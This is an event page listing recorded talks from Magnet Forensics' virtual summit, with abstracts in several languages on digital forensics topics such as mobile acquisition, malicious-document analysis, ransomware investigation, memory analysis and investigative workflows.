Magnet Virtual Summit Recordings
Browse our Magnet Virtual Summit Recordings
Throughout May, we offered our first Magnet Virtual Summit—a wide selection of fantastic thought leadership presentations, Magnet Forensics product sessions, and labs all in an easy virtual format. The recordings from this live virtual event can be found below.
Magnet Virtual Summit // NA & EMEA
A Blessing In Disguise: How To Conduct Remote Mobile Acquisitions For Investigations & Preservation
One of the biggest handicaps to device acquisition and analysis is getting information from devices that are not geographically feasible, or time is not on the investigator’s side. In the past, the only method of collecting mobile devices was either through on-site collections or through various cloud management solutions. This gives a person-of-interest time to coordinate potential deletion of objects prior to the collections. However, due to new technological advancements in both Forensic tools and techniques, more options may be available. By demonstrating these remote capabilities for both iOS and Android devices, an investigator can provide much more concise approach to device collection – thereby potential cost savings and/or legal ramifications.
Collaboration To Combat Online Child Exploitation
Learn how Canada is working with ProjectVic, and Magnet Forensics to protect children and combat online Child Sexual Exploitation (CSE). As well, a case study on how to export identifiers into other intelligence systems to find the truth in how your suspect is communicating with other CSE offenders and perhaps targeting children.
Creating A Digital Forensic Workflow to Combat Data Exfiltration
As my boss once told me first thing on a Monday morning, “No pressure, but you have a day to figure out how the data was stolen”. This presentation is based on several case studies where data was exfiltrated and the digital forensic fingerprints left behind.
Cryptocurrency Investigation And Following The Transaction Trail
With the increasing usage of cryptocurrencies and blockchains in today’s world, eDiscovery professionals need to understand how these emerging technologies should be considered and investigated as part of data discovery and legal discovery processes. This session will highlight both cryptocurrencies and blockchains, and provide attendees with fundamental information that will help them understand how to examine and investigate these technologies and the electronically stored information that results from their usage.
Dude, Where Are My (Encryption) Keys?! A Reverse Engineer’s Take On Secure Messaging For Mobile
Would you consider buying a new car that had no keys, invisible locks, and only a written commitment from the dealership that the car is only going to respond to you and can’t be stolen by any random person walking by?
Yet in the world of secure messaging, this exact scenario plays out every day: the general public are expected to make informed decisions on what apps they should be trusting their private data with. They must decide based on marketing jargon, download counts and customer reviews, and the media. Security, and by extension secure messaging, are at the forefront of our minds more than any time in history. This talk explores just how reliable these sources are from the perspective of a reverse engineer. From the impressive, to the laughable, to the downright creepy – popular secure chat apps will be put under the microscope.
Reverse engineering is a subject many forensics professionals know about, but seldom think to apply to their forensic examinations. We will also present on a real-world example where reverse engineering proved indispensable in refuting an alibi for a homicide file.
Emoting Over Emotet And Maldoc
Malicious documents in the form of email attachments have and continue to wreak havoc on individual users, the private business sector as well as local and federal government. According to Verizon’s 2018 Data Breach report, 32% of all data breaches derived from phishing attacks. Avanan email security reports that 1 in 25 branded emails is a phishing email of which 42% of all malicious email attachments pose as Microsoft. Symantec reports that 48% of all malicious malware attachments are crafted as Microsoft Office documents. Malwarebytes reports that in 2018 there was a significant rise in Emotet and Trickbot malspam campaign, and that as of Q1 2019 Emotet and Trickbot have contributed to 61% of all malicious email payload deliveries.
This presentation will focus on malicious document analysis as it relates to Adobe PDFs and Microsoft Office documents. The presentation will cover the use of numerous open source tools which will allow the forensic examiner to identify, extract and analyze malicious content embedded within Adobe PDF and Microsoft Office documents. During the presentation I will discuss and illustrate how malware authors take advantage of macros within Microsoft Office documents by implementing malicious Java and or VBA script as well as provide analysis techniques for analyzing these malicious scripts. With living off the land techniques on the rise this presentation will cover how to locate and decode base64 encoded and obfuscated PowerShell scripts which have been embedded within malicious documents. During this analysis process I will discuss how to identify whether the malicious document is a dropper or a downloader and what threat intelligence can be obtained and used from the data. Lastly, I will illustrate how to locate, extract and analyze embedded shell code from within malicious documents as well as explain how and why shell code is used for malicious intent.
This presentation will use current malware and malicious document samples such as Emotet and Trickbot to provide the attendants with techniques for analyzing malspam incidents with many freely available open source analysis tools. The outcome of this presentation is to further enhance the participants data breach investigations, identify methods for building YARA rules or IOC’s to harden and defend their network and or implement these analysis techniques into their existing incident response tools and automation processes.
Fighting Irish Fighting Crime: College Students Serving as Sworn Investigators
Police investigations today are shaped by the digital world. With the increasing availability of technology, digital evidence is now considered in every case and often holds the incriminating or exonerating evidence. Cell phones, computers, social media accounts, IoT devices, and other digital-enabled devices are now considered crucial evidence, and the ability to retrieve this information is more valued than ever. With this influx of digital information, police agencies everywhere are struggling to analyze the sheer volume of digital evidence with which they are presented. Additionally, finding qualified investigators who are well versed and educated in the field of technology has become more important than ever. This talk will discuss how the St. Joseph County’s (Indiana) Cyber Crimes Unit found a solution that addresses the influx of digital evidence in law enforcement. By forming a unique partnership with the University of Notre Dame, the Cyber Crimes Unit has recruited and educated undergraduate students to serve as sworn investigators. The sworn-in student investigators use Magnet Forensics AXIOM, GrayKey, and open source investigation among other forensic tools to keep up with increased demand for digital evidence analysis. In fact, by swearing in student investigators, the county has reduced digital case backlog from 30 days to down to zero since the beginning of the partnership.
I Run A Digital Forensics Unit And I Am A Terrible Manager
I am the Director of the St. Joseph County, IN Cyber Crimes Unit. The unit consists of ten college students, one high school student, and myself. We’ve all heard the horror stories about this generation of workers, which currently accounts for over 50% of the workforce. Among other things, they are entitled, lazy, unmotivated, disloyal, and selfish. Combine that with the fact that I am a terrible manager and it sounds like a recipe for disaster. But it hasn’t been.
The unit has been successful beyond imagination. We analyze over 500 devices a year. Our case backlog is zero cases. Our turnaround time is routinely same day. This talk will discuss a new paradigm in the workforce and our forensics lab. When I became the Cyber Crimes Director, I had no formal training or experience as a manager. So I bucked the convention wisdom of management and decided not to manage at all.
Instead, I took the approach of being a leader. What I’ve learned through leadership is that if you take care of the people taking care of the work, the people taking care of the work will excel beyond expectations. This simple concept that you manage things, but you lead people, will be discussed. Lessons from this talk can be applied by anyone in any industry to usher in a new area of the end of management and a focus on leadership at every level.
MacOS Forensics: The Next Level – Taming The T2 Chip & More
So, you wanna do mac forensics, but your department won’t buy the mac forensics tools? You have a mac with the T2 chip and can’t image with conventional imagers? Or T2 + FileVault/Encrypted APFS? Not to worry! Contrary to popular belief, you don’t need expensive specialist tools to perform mac forensics. We explain the internals and show you how it’s done with open source tools. From creating your own forensic boot disk to imaging and analysis of APFS on T2 macs, empower yourself with open source, and complement your existing forensic toolset! We’ll showcase some new artifacts too.
Malware And More: A Look Into Windows Memory
In many cases, memory analysis can provide access to data you can’t get through “dead-box” forensics alone and may be the only way to obtain evidence critical to solving your investigation. Malware investigations in particular can benefit significantly from memory analysis, but that is not the only type of investigation that Memory analysis can play a crucial role. This session will discuss how Magnet AXIOM’s integration of core plugins from the popular tool, Volatility, makes deep memory analysis more accessible to forensic examiners. Learn how to incorporate memory artifacts into a broader timeline together with artifacts from other data sources for a well-rounded investigation. In addition, we’ll explore the free tool MAGNET Process Capture to analyze memory from specific processes, providing a less fragmented output and better data recovery.
Need for Speed with Magnet OUTRIDER
This presentation will focus on the development and deployment of an extremely quick triage tool, Magnet OUTRIDER. This tool was designed to help examiners prioritize which evidence to analyze first in their investigations, while either on-scene or back in the lab, using automation tools on seized exhibits. We will describe how and why OUTRIDER was developed followed by how the tool has been piloted in multiple countries and refined by feedback from the field. We will also provide some examples of various use cases where OUTRIDER has been utilized
During this presentation, see how the tool works, get insights into future developments and as an attendee, you’ll have the opportunity to share any feedback that you have regarding the tool. See for yourself how the tool can vastly reduce the number of devices seized while on-scene or how to quickly triage through multiple devices back at the lab to reduce backlogs in this webinar on Magnet OUTRIDER.
Not Your Father’s Forensics
Data volumes are exploding as are potential data sources requiring analysis for investigations. Wading through such volumes can take time that corporations don’t have and have unnecessarily high costs. For corporate investigations and compliance, growing data volumes creates a pressing need for methods, technologies and processes which can be used to quickly analyze massive amounts of communications and information.
One such technology is conceptual analytics, which has been used by corporations and government agencies to assist with document review, e-discovery and data management. Now, organizations are realizing that analytics has tremendous potential to improve efficiency and accuracy in data-intensive inquiries. Keyword searches can be very useful when you know exactly what it is that you are looking for, but no one calls a bribe a bribe. Shifting our approach toward analytics allows us to describe the ideas and activities at issue within a collection of exemplar paragraphs, and then let the analytics engine find and report the correlations and connections. Organizations facing investigations, or simply developing compliance assurance protocols, can include conceptual analytics in their initiatives to prioritize collection efforts, proactively audit corporate document populations, and identify priorities in the areas of training, monitoring and policy development. In today’s presentation we will discuss the foundations of analytics, and explore exciting new developments in workflows, methods, and applications – all of which can be leveraged in compliance initiatives and investigations of all kinds.
Performing Linux Forensic Analysis & Why You Should Care
Why do we need to learn Linux Forensics? Well, nowadays when you look at the number of tools available on different penetration testing systems running Linux, you should stop and ask yourself a basic question “are these tools and systems always going to be used for ethical purposes?” The answer is definitely, NO! Another reason to consider learning Linux forensics is that not everyone uses Windows. You may arrive at a crime scene only to find that your suspect’s computer is a Linux operating system! If you don’t have the proper skillset, you will be shocked and start to question your knowledge and abilities. What should I do? Do I have the skills required to collect data from this system? Where should I look for artifacts? What do these artifacts even look like? How can we identify and track user activity? etc. The goal of this workshop is to help DFIR analysts build the most important knowledge and skills that will give them confidence when encountering computers running a Linux OS, whether used as a desktop or server.
Practioner Research Needs And Academic Support Through Graduate Programs
Join Joe Walsh from DeSales University for an insightful review of the research being conducted by graduate students and the impact it’s having on the forensics community. This will be an interactive presentation, so please come prepared to discuss training needs and research possibilities. Participants will have the opportunity to learn more about the digital forensics master’s degree programs and will be entered to win a graduate course for participation.
Putting the RDPieces Back Together Again
Ransomware investigations are becoming increasingly prevalent, and the questions an analyst are faced with are similar in almost every investigation:
- How did the attacker get in?
- How long did the attacker have access to system(s)
- What files/folders did the attackers access?
- Was there any data exfiltration?
A majority of ransomware now does “cleanup” after running, and deletes and overwrites important data such as event logs, recent user activity, powershell commands, etc. This talk delves into a quite often looked-at artifact called the RDP Bitmap cache, which may contain the answers that are needed to make a determination one way or another on ransomware related questions. It is a very interesting, and very under utilized artifact, that allows an analyst to quite literally piece together “what had happened was…”
Reverse Engineering Android for Examiners, An Introduction
Reverse engineering (RE) is a skill that represents foundational work that our favorite forensic tools are built upon. But when you as an examiner encounter an app that isn’t supported anywhere, what recourse do you have? Join Chris Atha (NW3C) and Mike Williamson (Magnet Forensics) for an introduction to the fascinating, ever-changing world of RE. After an overview of basic RE concepts, challenges, and potential use-cases for forensic examiners, participants will dive in to manipulating live Android apps using Frida, a popular open source toolkit for dynamic binary instrumentation (DBI). No prior programming knowledge required – we will walk you through the process. Just how easy is that vault passcode to bypass? Join us and find out!
Shall We Play A Game? Love To. How About The Internet Of Things Forensic Challenge?
Have you ever considered using the Internet of Things as evidence in your case? This session will provide the audience a hands-on experience focusing on the identification, collection and analysis of Internet of Things artifacts. The audience will work through case scenarios and gain practical experience all while having fun with one the world’s leading experts on Internet of Things forensics.
Taking A Byte of Chromebook Analysis
A new challenge of forensics is upon us as Chromebooks become more and more popular. One of the challenges is understanding the difference obtained from different types of acquisitions as well as the cloud. Due to this challenge, a group of 30 forensic examiners came together to workshop the problem at a Brews and Bytes event in Denver, Colorado. From that perch in the mile high city, we assessed the data in the cloud, as well as more terrestrial images from Chromium VM and data from Chromebook acquisitions. The analysis team looked at different locations where data can reside and compared the different types of acquisitions. The team then continued to build on the one day workshop to develop the comparative analysis we will present of the types of data that can be recovered from different sources associated with Chromebooks and where it resides.
The Art Of Juggling: IR Circus Tricks For The Overwhelmed
Incident Response, like juggling flaming dumpsters or swallowing swords, is not for the faint of heart. When was the last time you did a collection where everything went exactly right? Or your analysis didnʼt encounter a massive hitch? Join your ringmasters, Heather and Shelly, on an exciting trip to the IR Circus! Weʼll share tips and tricks to help you juggle your sanity with collection and analysis tasks sure to impress your customers and your team!
The Evolution of Ransomware – Attack, Investigation, Response & Prevention Strategies
Ransomware attacks can present an existential threat to a targeted organization, and over time they have morphed and changed, becoming ever more sophisticated. With global ransomware attacks estimated as high as 204,000,000 incidents in 2018, this is not only a problem that is not going away soon, but one where prevention efforts are widely missing the mark. This presentation will look at the evolution of ransomware attack methods, and will focus on successful response and investigation strategies as well as emerging approaches to more effective prevention methods.
Thinking DFIRently: Utilizing Technology to Work Smarter Than Ever
We’re in a critical time for digital forensics where the ways we’re used to working cases may not be enough to keep up anymore. As the amount of digital evidence continues to grow, the amount of case backlogs grow with it. Digital forensics labs need to create a more efficient workflow by automating repetitive and predictable tasks—freeing up examiners to apply their expertise on the evidence at hand.
Join Jessica Hyde of Magnet Forensics and Aaron Sparling Sparling of the Portland Police Bureau, Digital Forensics Unit as they deep dive into the challenges facing labs today and how a practical approach to leveraging automation can help increase efficiency and reduce backlogs in the forensics lab. They’ll cover the differences between traditional forensic workflows and the optimized Magnet AUTOMATE workflow, including new features in the latest AUTOMATE release. Next, find out how Aaron’s 2.5 person team at the Portland Police Bureau, Digital Forensics Unit use AUTOMATE to solve cases faster, integrate Magnet OUTRIDER to triage devices within AUTOMATE workflows, and conduct advanced deep-dive memory workflows.
Magnet Virtual Summit // APAC
Recordings from our APAC virtual event can be found listed below.
欢迎加入我们的在线会议 – 除了分享最新行业趋势和变化外，我们将会分享AXIOM 4.0所带来的具有创新特性的最新特性 – 致力于帮助减少案件积压、从最多数据源恢复证据，并提高电子取证分析的效率。
“Carpe Diem” – Seize the scene including a multitude of endpoint devices and online services
Part I. Introducing a new integration framework for examining data from any sources:
- CARPE: an open-source digital forensic integration framework
- CARPE Internals – design concept and architecture
- Current development status
- Future development plans (including our research activities on DFIR)
Part II. Introducing our activities on IoT Forensics:
- Digital forensics in the IoT world
- Deep understanding of IoT ecosystem
- Strategies for digital investigation in the IoT world
- Case study: an AI speaker and a fitness tracker
Policy-making and capacity-building to combat cybercrime in Asia Pacific
Crime and drug challenges in Southeast Asia and the Pacific are multifaceted, and many are transnational in nature. Learn how UNODC has been engaging with Laos for the past two years to jointly set up the first Digital Forensics Laboratory. With the help of various technology providers, including Magnet Forensics, UNODC is continuously delivering training and mentoring to investigators to address the technical and legal challenges posed by new technologies and devices.
由於蘋果公司定期會針對macOS進行更動，因此調查Mac裝置頗具挑戰性。 一起來了解最新macOS檔案系統（APFS）與從HFS +更新至APFS後所做的改變，同時講述運用Magnet AXIOM來完善macOS的調查結果。 在此網絡研討會中，鑒真數位不僅會講述最新macOS 作業系統10.15（Catalina）更新後的改變，也會闡述macOS作業系統跡證和檔案，例如：KnowledgeC.db，FSEvents，Volume Mount Points，Quarantined Files，AirDrop和bash歷史記錄， 並將相關跡證建立起關聯性，以利協助調查。
恶意软件以及更多：了解 Windows 内存
在很多案件调查中，内存分析可以给我们提供一些通过常规硬盘取证得不到的数据，它甚至是获取案件调查关键数据的唯一方法。特别是恶意软件调查，内存分析可以提供极大的帮助；但除此类型之外，对于其他一些类型的调查取证，内存分析同样扮演很关键的角色。此次线上交流我们会探讨Magnet AXIOM所集成的Volatility，及其如何让取证分析人员更简便的进行深层内存分析。了解如何把内存痕迹及其他数据源中的痕迹包含在一个大的时间线，以便进行全面的调查。另外，我们将了解如何使用免费的Magnet Process Capture对特定的进程分析内存数据。
마그넷 엑시움: 클라우드 포렌식 수사
- 클라우드 저장 서비스 소개
- 알려져 있는 클라우드 포렌식 수사 방법
- 증거 데이터 수집 기법과 한계점
- 수집된 증거들의 분석 기법
在數位化變革的大環境下，雲端存儲之運用已日趨普遍。作為行動設備、電腦到及物聯網（IoT）設備等存儲空間的延伸，雲端儲存對於公務機關和私人企業的調查人員而言也是重要的數據來源之一，有時甚至是唯一能取得資料的來源。即便如此，在法律或司法程序規範下，許多調查人員僅對裝置內的儲存空間取得的資料，無疑限縮了找尋更多資料的可能性。在本研討會中，我們將探討雲端存儲和一般設備存儲空間的差異，包括每種類型裝置上可獲取的資料內容，並探討調查人員為何與如何錯過這些重要數據，從中了解錯失這些重要數據後所造成的潛在影響。最後，從操作流程的面向去了解獲取雲端儲存資料的可行性，以便化逆境為轉機。 歡迎與鑒真數位一起詳細了解如何獲取雲端儲存資源，例如Google (Google Takeout)的和Facebook (Facebook Download My Data)使用者帳號的備份資料，並學習如何將各證據來源資料使用“關聯分析”和“時間序列”等功能串聯彼此的關係。
Magnet Virtual Summit // LATAM
Recordings from our LATAM Day Event can be found below.
Investigaciones corporativas con AXIOM CYBER
Los riesgos y desafíos dentro del ámbito corporativo están en incremento ante nuevos escenarios como es el trabajo remoto, donde temas como el fraude, robo de información sensible o amenazas externas como ataques de malware y ransomeware, precisan de investigaciones integrales donde la evidencia se pueda adquirir, analizar y reportar rápidamente.
Únase a nuestro webinar en español donde Aaron Hernandez (cuentas LATAM) y Enrique Banda (Ingeniero de ventas en Magnet Forensics) harán una demostración de cómo AXIOM CYBER puede acelerar sus investigaciones corporativas mientras examina fuentes de evidencia en computadoras, smartphones y la Nube. En esta sesión, Aaron explicará la importancia de AXIOM CYBER para las áreas de investigación, seguridad de la Información y auditorías, mientras que Enrique Banda presentará un caso de filtración de documentos con información sensible, apoyándose en las capacidades de adquisición remota y de diferentes funciones de análisis y examinación para encontrar información crítica y vital para la investigación.
Os Novos Modelos De Investigação Forense Nos Segmentos Público E Privado
Os investigadores forenses digitais, peritos e auditores não precisam apenas enfrentar desafios tecnológicos, mas também existem os legais, administrativos e institucionais que frequentemente limitam a margem de ação e tomada de decisões.
Partir de uma visão de 360 ° e de toolkit, permitirá lidar com as tarefas de investigação de uma forma estratégica e colaborativa. Por isso, convidamos-lhe a participar desta sessão em português, na qual os nossos palestrantes abordarão três cenários para explicar como a implementação de tecnologia e ações preventivas podem fazer a diferença frente nas investigações digitais 360° na denominada nova realidade.
Perspectivas Sobre El Futuro De Las Investigaciones Forenses Digitales Post COVID-19: Repensar Una “Nueva Normalidad”
La pandemia derivada por COVID-19 no sólo ha replanteado las agendas de riesgos y amenazas globales para el sector público o privado, sino además reorganizó nuestra forma de trabajo y de interacción con los demás de un entorno físico a uno virtual remoto. En dicho escenario, la conectividad y los flujos de información han jugado un papel crucial, pues a través de computadoras, tabletas, smartphones, IoT y la nube, se han mantenido la mayoría de operaciones; sin embargo, también han aumentado los delitos informáticos, pues el cibercrimen ha capitalizado esta coyuntura aprovechando las vulnerabilidades y, en consecuencia, hay una complejidad para el proceso de investigación digital, ya que factores como el número de casos asignados por examinador, las grandes cantidades de información almacenadas por evidencia, el factor tiempo o el aún vigente distanciamiento social con pocas posibilidades de acceso físico a la evidencia en los sitios de trabajo o a la escena del crimen, son desafíos que deberán resolverse en el marco de la “nueva normalidad”, la pregunta es ¿estamos preparados?.
Únase a este webinar donde tendremos la oportunidad de conocer las perspectivas sobre el futuro de las Investigaciones Forenses Digitales desde la óptica del sector público y privado desde la óptica del Teniente Wolfan Yessid Prada Roa miembro del Centro Cibernético Policial de Colombia, y de la Dra. Aury Curbelo CEO en Digitech.